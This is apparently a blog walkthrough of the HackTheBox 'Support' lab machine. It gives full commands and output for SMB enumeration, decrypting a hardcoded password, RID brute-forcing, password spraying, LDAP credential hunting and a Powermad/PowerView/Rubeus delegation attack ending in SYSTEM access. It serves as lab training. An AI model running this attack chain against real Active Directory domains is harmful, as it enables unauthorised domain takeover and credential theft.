Support Writeup (HackTheBox Easy Machine)

-


Overview

Support is an easy Windows machine from HackTheBox. This box is perfect for beginners as it tackles some common vulnerabilities from multiple fields like Windows Active Directories and reverse engineering. Although this box is marked as easy, it can still confuse you like me.

We start with discovering an interesting binary on one SMB share. After we reverse engineer the binary with dnSpy, we can find hardcoded encrypted password for one of the users. We XOR the encrypted password with a key and get the cleartext password.

Next, we do LDAP search and find another cleartext password for another user. We soon figure out that this user belongs into special group that has full control over Domain Controller. We abuse this permission by creating fake account on the machine and allow DC to act on behalf of other identity.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.11.174 -T5                      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 11:38 EDT
Nmap scan report for 10.10.11.174
Host is up (0.041s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-07 15:38:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-07T15:38:32
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   40.51 ms 10.10.14.1
2   40.95 ms 10.10.11.174

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.72 seconds

The Nmap scan showed 12 open ports. We have common Windows Active Directory ports open like SMB (Server Message Block), LDAP (Lightweight Directory Access Protocol) and RPC (Remote Procedure Call). There’s also DNS (Domain Name System) and Kerberos (network authentication protocol), which looks like this exact machine is the DC or Domain Controller. Don’t forget to add “support.htb” domain to “/etc/hosts”.

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It’s used to manage and organize network resources, like users, computers, printers, and more. Think of it as a digital phone book or a control center for everything connected to a company’s network. (ChatGPT)

Domain Controller (DC) in Active Directory (AD) is a server that handles the security authentication requests within a Windows domain. Basically, it’s the brain of an Active Directory environment. (ChatGPT)


Service enumeration with Enum4Linux-ng

I launched “Enum4Linux-ng”, which is an enumeration tool for Windows and Samba systems. I ran it with default user “guest”, which is a common way to run these scanners in AD environments.

Lot of things came back, including domain information and computer name. Don’t forget to add “dc.support.htb” to your “/etc/hosts” file. That is the name of DC computer.

RPC enumeration of users and groups failed due to denied access.

SMB enumeration showed multiple shares, but only one “support-tools” was accessible.


I used “smbclient” to connect to the share. I found couple interesting files there. One that stood out was “UserInfo.exe.zip” as it’s the only unknown archive here. I quickly downloaded it.

┌──(kali㉿kali)-[~]
└─$ smbclient \\\\support.htb\\support-tools -U SUPPORT/guest
Password for [SUPPORT\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 968659 blocks available
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (269.6 KiloBytes/sec) (average 269.6 KiloBytes/sec)
smb: \>

I extracted the archive and got an executable, config file and multiple DLLs.


Reverse engineering with dnSpy

At first, I ran “strings” with “UserInfo.exe” to get an idea what this executable is all about.

finding .NET strings in the binary

There were couple strings indicating that .NET Framework had been used, so most likely a C# code. After this finding, I switched over to Windows, specifically to tool called “dnSpy”, which is a popular decompiler for programs that were coded in C# specifically.


I opened “UserInfo.exe” in “dnSpy” and looked at the decompiled source code.

There were several interesting functions like “FindUser” or “LdapQuery”, which made me think that this could be some application that communicates with LDAP and serves information about users.

After looking through the functions, one named “Protected” had 2 variables called “enc_password” and “key”. That looked like insecurely hardcoded credentials to me. Plus, there was “getPassword()” function right above, seemingly decoding the password.

encrypted password hardcoded in the binary


This function basically decodes the encrypted string and then XORs it with the key “armando” and some number 223. I asked ChatGPT to write me a Python script that decrypts this password.

import base64

def xor_decrypt(data: bytes, key: str, extra_xor: int) -> bytes:
    key_bytes = key.encode()
    key_length = len(key_bytes)
    return bytes([
        (b ^ key_bytes[i % key_length] ^ extra_xor)
        for i, b in enumerate(data)
    ])

# Input base64 string
encoded_str = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"

# Decode from base64
decoded_bytes = base64.b64decode(encoded_str)

# XOR with key and 223
key = "armando"
extra_xor_value = 223
result = xor_decrypt(decoded_bytes, key, extra_xor_value)

# Print result as a string (or hex if non-printable)
try:
    print("Decrypted result:", result.decode())
except UnicodeDecodeError:
    print("Decrypted result (hex):", result.hex())
┌──(kali㉿kali)-[~]
└─$ python3 script.py                                                             
Decrypted result: [REDACTED]

I got the password! But don’t know to which user.


Username enumeration via RID brute-forcing & password spraying via Kerbrute

It’s important to understand that every user has his SID, which serves as his unique identifier. These are mostly random, but there’s also guessable part of SIDs called RIDs. There’s a tool called “impacket-lookupsid.py” that tries to guess these RIDs and get the usernames.

┌──(kali㉿kali)-[~]
└─$ lookupsid.py SUPPORT/guest:""@support.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Brute forcing SIDs at support.htb
[*] StringBinding ncacn_np:support.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1677581083-3380853377-188903654
=====================================
 [LOTS OF UNIMPORTANT USERNAMES]
=====================================
1104: SUPPORT\ldap (SidTypeUser)
1105: SUPPORT\support (SidTypeUser)
1106: SUPPORT\smith.rosario (SidTypeUser)
1107: SUPPORT\hernandez.stanley (SidTypeUser)
1108: SUPPORT\wilson.shelby (SidTypeUser)
1109: SUPPORT\anderson.damian (SidTypeUser)
1110: SUPPORT\thomas.raphael (SidTypeUser)
1111: SUPPORT\levine.leopoldo (SidTypeUser)
1112: SUPPORT\raven.clifton (SidTypeUser)
1113: SUPPORT\bardot.mary (SidTypeUser)
1114: SUPPORT\cromwell.gerard (SidTypeUser)
1115: SUPPORT\monroe.david (SidTypeUser)
1116: SUPPORT\west.laura (SidTypeUser)
1117: SUPPORT\langley.lucy (SidTypeUser)
1118: SUPPORT\daughtler.mabel (SidTypeUser)
1119: SUPPORT\stoll.rachelle (SidTypeUser)
1120: SUPPORT\ford.victoria (SidTypeUser)
2601: SUPPORT\MANAGEMENT$ (SidTypeUser)

We can validate these usernames with tool like “Kerbrute”, which checks this usernames against Kerberos authentication protocol. As we can see, every one of them is valid.


Luckily for us, “Kerbrute” also has password spraying capability, so we can find out which user’s password we got. And as it turned out, we got the password for user “ldap”.


Discovering password for user “support” with LDAP enumeration & getting user flag

Life gets a bit easier now. Now that we got some working credentials, we can re-run our enumeration script “Enum4Linux-ng” and hopefully get some more information.

RPC finally allowed me to enumerate users and groups. However, this was not very helpful because I already got most of the information about users on this machine.

Next, I tried to log in via “evil-winrm” as port 5985 running WinRM (Windows Remote Management) was open. Unfortunately, no success there as well.


It was time to use Bloodhound to perform additional enumeration on each user’s privileges, access controls and other stuff. Since I didn’t have a shell yet, I had to use the Python version. In the command, I used flag ”-ns” instead of ”-dc” because script had problems with it.

┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c All -u ldap -p "nvEfEK16^1aM4\$XXXXXXXXXXXXXXXXXXXXXX" -d support.htb -ns 10.10.11.174
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FAKE-COMP01.support.htb
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
WARNING: Could not resolve: FAKE-COMP01.support.htb: The DNS query name does not exist: FAKE-COMP01.support.htb.
INFO: Done in 00M 10S

I started the Neo4j graph database and launched Bloodhound. After importing all the JSON files, I marked user “ldap” as owned and looked for other valuable information.

User “ldap” didn’t have any outbound object controls. After that, I looked at paths to unconstrained delegation systems and found out that there’s unusual group called “Shared support accounts” with only one user “support”, who also happens to have “CanPSRemote” privilege over DC computer.

PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system. (Bloodhound)

user “support” has “CanPSRemote” privilege over DC computer


Bloodhound didn’t give us any usable information at the moment. Problem with Bloodhound is that it only looks at “description” field in LDAP. We need a tool that looks into other LDAP fields as well. There is such tool called “ldapsearch”. The syntax is a bit weird I must say.

┌──(kali㉿kali)-[~]
└─$ ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w "nvEfEK16^1aM4\$e7AcXXXXXXXXXXXXXXX" -b "dc=support,dc=htb" > ldap.txt

We get a LOT of information. As we already know, we are particularly interested in user “support” because of it’s privileges. After finding this user’s section in the output, we could see one weird field called “info” with some string, looking like a password.

finding password for user “support” during LDAP search


We could see in the Bloodhound earlier that user “support” is indeed in “Remote management users” group, thus we should have access to WinRM on port 5985.

Success! Now we can go into support’s home directory and get the user flag from Desktop folder.


Privilege escalation by adding fake account, getting Administrator’s Kerberos ticket & getting root flag

Since the privilege “CanPSRemote” we found earlier doesn’t give us any value in this situation, we have to look for other privilege escalation methods. I went back to the Bloodhound and looked carefully once again at our user “support” and all his relations.

As we know already, user “support” is the only member of “Shared support accounts” group, which happens to have “GenericAll” privilege over our domain controller computer “dc.support.htb”.

This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish. (Bloodhound)

“Shared support accounts” group has “GenericAll” privilege over DC computer

If we right-click on the privilege, Bloodhound shows us a method we can use to abuse this and gain access to “NT Authority\system” user (basically like “root” user on Linux systems).

Bloodhound’s guide on how to exploit the privilege

I will summarize this method with all the commands I used.


Firstly, I transferred all needed binaries onto the machine (”Powermad”, “Powerview” and “Rubeus”). Then, I used command to bypass execution policy, which allows me to run my scripts.

“Powermad” is a PowerShell tool used for creating and managing machine accounts in Active Directory environments, often for exploitation or persistence. “Powerview” is a PowerShell tool used for reconnaissance in Active Directory, helping attackers or defenders gather detailed domain information. “Rubeus” is a C# toolset for Kerberos interaction and abuse, allowing for ticket extraction, forging, and pass-the-ticket attacks. (ChatGPT)


1. We use “Powermad” to add fake new computer account into the network.

*Evil-WinRM* PS C:\Users\support\Documents> . .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
[+] Machine account attackersystem added

2. With “PowerView”, we can retrieve the security identifier (SID) of the newly created account.

3. We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE.

ACE (Access Control Entry) is a single entry in an Access Control List (ACL), which defines the permissions or rights that a user, group, or security principal has on a particular object, like a user, group, OU, file, or folder. (ChatGPT)

DACL (Discretionary Access Control List) is a list that defines who is allowed or denied access to a securable object (like a file, folder, registry key, AD object, etc.). (ChatGPT)

*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
*Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0)

4. Next, we need to set this newly created security descriptor in the “msDS-AllowedToActOnBehalfOfOtherIdentity” field of the computer account we’re taking over, again using “PowerView” in this case.

*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

5. We use “Rubeus” to hash the password we set into rc4_hmac form.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : Summer2018!
[*] Input username             : attackersystem
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBattackersystem
[*]       rc4_hmac             : EF266C6B963C0BB683941032008AD47F
[*]       aes128_cts_hmac_sha1 : 5A09B80DB82B31F376C2347E7FC4B4E2
[*]       aes256_cts_hmac_sha1 : FA2EE2E2F261D6D05B89C7C87E7F0AB448B6F5FB4BAD0A353FFE0B2484EB1EE8
[*]       des_cbc_md5          : 048097B92F5E2683

6. And finally we can use Rubeus’ “s4u” module to get a service ticket for the service name (sname) we want to ‘pretend’ to be “admin” for. This ticket is injected and in this case grants us access to the file system of the domain controller computer “dc.support.htb”.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:attackersystem /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: EF266C6B963C0BB683941032008AD47F
[*] Building AS-REQ (w/ preauth) for: 'support.htb\attackersystem'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFoDCCBZygAwIBBaEDAgEWooIEsjCCBK5hggSqMIIEpqADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
      AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBGwwggRooAMCARKhAwIBAqKCBFoEggRWM7oX2J13
      wOETdD5fEe840eEQk2CTQXx0yldHdlc03ypQjTyevkbhQ1/1vvtdYhkFzwfsvu4c0fUhdkxEPMVXjc68

===============================================
    [LOTS OF DATA AND BASE64 STRINGS]
===============================================

[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      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
[+] Ticket successfully imported!


We now have base64 encoded Kerberos ticket for Admin after all this. Before using it, we need to convert it into usable form. Base64 decode it first, then use “ticketConverter.py” to convert the ticket from “.kirbi” to “.ccache” format, which is the format we want and need.

And finally, we load our ticket into “KRB5CCNAME” environment variable and log into the machine as “administrator” with Impacket Python script “psexec.py”.

“KRB5CCNAME” is an environment variable used in Kerberos 5 authentication systems. It tells the system where to find the Kerberos credential cache (also known as the “ticket cache”), which stores the user’s authentication tickets after they log in using Kerberos. (ChatGPT)

psexec.py” lets you execute commands on a remote Windows machine over SMB, typically using NTLM authentication. It’s often used in penetration testing and red team operations to run commands remotely after obtaining credentials or hashes. (ChatGPT)

We get the shell as “nt authority\system”. Root flag waits for us in Administrator’s Desktop folder.


Summary

Support is an easy machine from HackTheBox. This box makes you practice your skills from multiple different fields in cybersecurity. It showcases why hardcoding your credentials into your applications is a bad idea, because we get the chance to reverse engineer a C# program in tool called dnSpy. It also teaches you that precise enumeration is the base of success, as we can find some very valuable information during enumerating services like LDAP. During the privilege escalation phase, we utilize the ultimate Active Directory enumeration tool called “Bloodhound”. We then abuse the infamous “GenericAll” privilege over the Domain Controller. We gather experience with several helpful tools like “Impacket” suite, “Rubeus” or “Powerview” during our way to “Administrator” account. We create a fake account on the machine and set DC to act on behalf of other identity, specifically on behalf of our fake account. I like this box a lot, as it was a lot of fun to solve multiple challenges this box puts you through. Truth be told, it covers a lot. Don’t worry if you get stuck and confused, I myself stagnated couple times. Definitely feels satisfying once you complete it though.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more